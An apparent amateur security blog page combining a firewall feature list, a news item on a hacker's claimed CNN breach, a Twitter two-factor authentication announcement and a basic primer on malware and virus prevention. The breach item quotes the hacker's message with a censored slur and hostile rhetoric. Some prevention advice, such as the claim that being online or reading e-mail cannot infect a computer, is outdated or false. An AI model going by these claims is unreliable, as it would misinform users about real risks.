Privacy Output Filtering	Blocks leakage of private information via HTTP response
Request Header Filtering	Blocks HTTP requests having headers that are missing important information or that have been abnormally modified, such as requests from automatic attack tools and abnormal HTTP requests.
Request Method Filtering	Blocks risky HTTP request methods
Response Header Filtering	Blocks leakage of web server information via HTTP response
SQL Injection	Blocks requests to inject SQL Query statement
Stealth Commanding	Blocks requests to execute specific commands in the web server through HTTP Request
Suspicious Access	Blocks access which is not fit the standard web browser request
Unicode Directory Traversal	Blocks request of access to directory and files using vulnerabilities related to Unicode manipulation of web server
URI Access Control	Controls requests of access to specific URIs and files
Website Defacement	Detects defacement of websites and recovers the web page

CNN Hacked !!!

HACKING NEWS !

CNN Got Hacked 

Hacker Reckz0r leaked nine admin user names and encrypted passwords, and claims to have published four fake articles on the site.

Hacker Reckz0r recently claimed to have breached CNN's International Web site, published four fake articles on the site, and leaked nine admin user names and encrypted passwords (h/t Cyber War News).

In a Pastebin post, Reckz0r wrote, "Sup? It's been a long f**kin' time, my friends, Today. I shall show you that silence is golden when you're trying to tap into more systems, and leak more crap. My target was 'CNN'. 'Why?', you must say? because they're a bunch of f**king f**gots trying to spread false news, your 9/11 is our 24/7. I strongly respect the Palestinian brotherhood, and it seems like CNN is on Israel's side. and you do know one thing; 'Whenever you see somebody supporting CNN, pwn him at sight.' Their systems are poorly-misconfigured, just like how NASA's DIRS is full of crap. CNN is no different from them, anyway. nuff' talkin' - Let the good ol' show begin. PUZZLE: I wrote 4 fake articles on edition.cnn.com, if you can guess what articles are those, I shall give you a crown, plus full-backup of CNN<3"

It's not clear where the four fake articles are, if they exist at all. In addition to the admin user names and passwords, Reckz0r posted a list of database tables and other information.

Twitter Intros Two-Factor Authentication

Twitter Intros Two-Factor Authentication

After a long series of embarrassing account breaches, Twitter today introduced login verification, a form of two-factor authentication (h/t GigaOM).
To active the new functionality (and you should, as soon as possible), users are advised to visit their account settings page, scroll down to Account security, click on the link (and follows instructions) to "add a phone," then select "Require a verification code when I sign in."
Once login verification is enabled, you'll receive a six-digit code via text message whenever you attempt to sign in -- that code will have to be entered along with your password in order to access your account.
"This release is built on top of Twitter via SMS, so we need to be able to send a text to your phone before you can enroll in login verification (which may not work with some cell phone providers)," Twitter's Jim O'Leary wrote in a blog post. "However, much of the server-side engineering work required to ship this feature has cleared the way for us to deliver more account security enhancements in the future. Stay tuned."

Internet Security

Introduction

• The digital world is changing at a tremendous speed. New communication technologies open up new possibilities, but by using them you can also expose yourself, and others, to risks. Many people have trouble assessing these risks especially with regard to the subject of safe digital communication. This is particularly true for people working in regimes with high levels of censorship. However, also in countries considered to be relatively free and uncensored, your data can be used or misused by others - governments, companies, or other persons (sometimes even unintended).
• How to protect yourself, your sources or your friends? What are safe routes to take? How do you secure after your personal data? This blog aims to address these issues to help you choose your own 'level' of safety.

What is the internet security?

• When a computer connects to a network and begins communicating with others, it is taking a risk. Internet security involves the protection of a computer's internet  account and files from intrusion of an unknown user.
• Basic security measures involve protection by well selected passwords, change of file permissions and back up of computer's data.
  

        

     What are the risks?

        -Vulnerabilities

        -Trojan horses

        -Worms
-Viruses
-Keyloggers
-Sniffers
-Phishing

                             
                                  ----------------------------------------------------

-Vulnerabilities

Vulnerabilities

   Vulnerabilities is a flaw or weakness in a system's design, implementation, or operation and management that could be exploited to violate the system's security policy.

-Trojan horses

   A Trojan horse, or Trojan, is a non-self-replicating type of maleware which appears to perform a desirable function but instead drops a malicious payload, often including a backdoor allowing unauthorized access to the target's computer. These backdoors tend to be invisible to average users. Trojans do not attempt to inject themselves into other files like a computer virus Trojan horses may steal information, or harm their host computer systems. Trojans may use drive-by downloads or install via online games or internet-driven applications in order to reach target computers. The term is derived from the Trojan Horse story in Greek Methology because Trojan horses employ a form of "social engineering", presenting themselves as harmless, useful gifts, in order to persuade victims to install them on their computers.

-Worms

   A  computer worm is a standalone Maleware Computer Program that replicates itself in order to spread to other computers. Often, it uses a computer network to spread itself, relying on security failures on the target computer to access it. Unlike acomputer virus, it does not need to attach itself to an existing program. Worms almost always cause at least some harm to the network, even if only by consuming bandwidth, whereas viruses almost always corrupt or modify files on a targeted computer

-Viruses

   A  computer virus is a program or piece of code that is loaded onto your computer without your knowledge and runs against your wishes. Viruses can also replicate themselves. All computer viruses are man-made. A simple virus that can make a copy of itself over and over again is relatively easy to produce. Even such a simple virus is dangerous because it will quickly use all available memory and bring the system to a halt. An even more dangerous type of virus is one capable of transmitting itself across networks and bypassing security systems.

  -Keyloggers

      A keylogger is a type of surveillance software (considered to be either software or spyware) that has the capability to record every keystroke you make to a log file, usually encrypted. A keylogger recorder can record instant messages, e-mail, and any information you type at any time using your keyboard. The log file created by the keylogger can then be sent to a specified receiver. Some keylogger programs will also record any e-mail addresses you use and Web Site URLs you visit.

Software Keylogger

Hardware Keylogger

-Sniffers

   Network sniffers monitors data flowing over computer network links. It can be a self-contained software program or a hardware device with the appropriate software or firmware programming. Also sometimes called "network probes" or "snoops," sniffers examine network traffic, making a copy of the data but without redirecting or altering it. Some sniffers work only with TCP/IP packets, but the more sophisticated tools can work with many other protocols and at lower levels including Ethernet frames.

   -Phishing

   Phishing is the act of attempting to acquire information such as usernames, passwords, and credit card details (and sometimes, indirectly, money) by masquerading as a trustworthy entity in an electronic communication. Communications purporting to be from popular social web sites, auction sites, online payment processors or IT administrators are commonly used to lure the unsuspecting public. Phishing emails may contain links to websites that are infected with malware.[1] Phishing is typically carried out by e-mail spoofing[2] or instant messaging,[3] and it often directs users to enter details at a fake website whose look and feel are almost identical to the legitimate one. Phishing is an example of social engineering techniques used to deceive users,[4] and exploits the poor usability of current web security technologies.[5] Attempts to deal with the growing number of reported phishing incidents include legislation, user training, public awareness, and technical security measures.

Link Manipulation

Link Manipulation

Fake ADDs

What can I do to protect myself from computer viruses and Trojans?

These days, practically everyone's online, downloading and exchanging files, and developers are in such a hurry to get their Web sites up or their files out that checking for a nasty bug is more of a courtesy than a requirement. If you're not careful, your computer can end up with a nasty virus that makes your files act oddly, crashes your computer, pops up bizarre messages, or worst of all, destroys your operating system.

A computer virus is the most subtle of computer problems. It usually loads itself into your computer system when you run a program to which it has attached itself. From the computer system, it'll then reproduce itself, much like a biological virus would, by attaching copies of itself to other programs on your hard drive. What it does then depends on the malevolence of its creator. Some viruses are nothing more than a practical joke. They may bring up a message like "Merry Xmas" or melt your display. Most of them though, either start destroying your system or your files immediately or on a date specified by their creators—like the much-publicized Michelangelo virus, which erases important pieces of your system on March 6. "Trojan horse" programs are similar to viruses in their effect on your system, but they can't reproduce themselves. They're usually a program disguised as something you might want to download onto your computer—for instance, a rogue, modified version of PKWare's PKZIP utility. But when you run the new program you just found, it can do anything from popping up a message to erasing your hard disk, as the rogue PKZIP utility really did.

In either case, you have to actually launch the infected program or the trojan horse for it to infiltrate your system. Though hoax e-mails, like the one about the "Good Times" virus try to make you believe otherwise, neither a virus nor a trojan horse program can do anything if you simply leave the malevolent file sitting on your hard drive.

Finding out that you copied a trojan horse onto your computer is remarkably easy. You launch the program, and the next thing you know, something completely unexpected happens—maybe your system is gone or your computer is laughing maniacally at you. But unless you notice your computer acting oddly before the virus has done its worst damage, you may very well not know you have it until it's too late.

   

   Protect Yourself

There are a few basic rules that computer users should follow to short-circuit viruses. The best known bit of advice is this: Never open any attachment unless you know who it's from and why they are sending it. Refusing to open unsolicited e-mail of any kind is the only sure-fire way to sidestep all forms of trouble.

Anti-virus software is crucial to preventing virus attacks, but this strategy only works if users update their software.Unfortunately, 'keeping it current' means updating it weekly, at least but most products today allow one to automate this process, but file downloads can be large and slow.

Factors to consider when buying an anti-virus package include cost, quality of tech support, how frequently the package self-updates and the platforms supported by the program.

Common sense is another good weapon in the fight against viruses. Be wary of opening any email attachments, even from your firends , especially if it has been forwarded to them.Set up your anti-virus product so that it automatically scans incoming e-mail and avoiding e-mail software that allows automatic launching of attachments.

If all of this sounds like a lot of work, it is. There is always a tradeoff between ease of use and security but the extra time you spend updating your anti-virus software now will save you hours of time and buckets of frustration later.If you don't keep it updated, you might was well be completely unprotected.

  Prevention

1. Be sure do a full back up of your system on a regular basis. The best way to clean up an infected file is to replace it with an original non-infected file. Not to mention the grief a current back up will save if a virus takes your system completely down. It's also a good idea to keep more than one set of backup in case the current one is infected before the virus is detected.

2. Always use an anti-virus software program, one with both an on-demand and an on-access scanner. You'll want to look for one that has a fairly complete database of viruses and that is updateable. New viruses are produced daily, so it's important to have software that can detect the latest threat.

Be sure to read the manual and follow the directions of the software program to ensure it's protecting you properly. Also, consider buying and using two different brands to be doubly protected. See our review of anti-virus programs.

3. Update the virus database in your anti-virus program regularly (each month or by the direction of the manufacturer).

4. Don't allow your web browser to automatically run programs, such as MS Word or other programs through its e-mail program. Configure your browser to launch WordPad or Notepad instead. One of the biggest and growing threats is the macro virus, which is spread through data processing and spread sheet programs

5. Configure your web browsers to disable ActiveX, Java, and Javascript. You'll lose some of the fun the Web's been known for, but you'll save your computer from contracting a virus and speed up your connection.

6. Know that the only way a virus spreads is either by launching an infected file or by booting an infected disk. You can not get a virus by simply being online or by reading e-mail. You have to download and launch an infected file before it will spread. Therefore, do not launch any unsolicited executable files sent via e-mail.

7. Using an updated anti-virus program, scan all new software for viruses before installing them on your hard drive. Even shrink-wrapped software from major publishers has been known to contain viruses.

8. Be aware of hoaxes. To increase mass hysteria, there have been many stories conjured up and spread by unacknowledged users. For a list of known hoaxes check out the following site: http://www.symantec.com/business/security_response/threatexplorer/risks/hoaxes.jsp

Viruses are not the only type of programs that are written solely to cripple computer systems or to use a computer in an unauthorized way. As i mentioned there are other malicious programs are Logic Bombs, Trojan Horses, and Worms.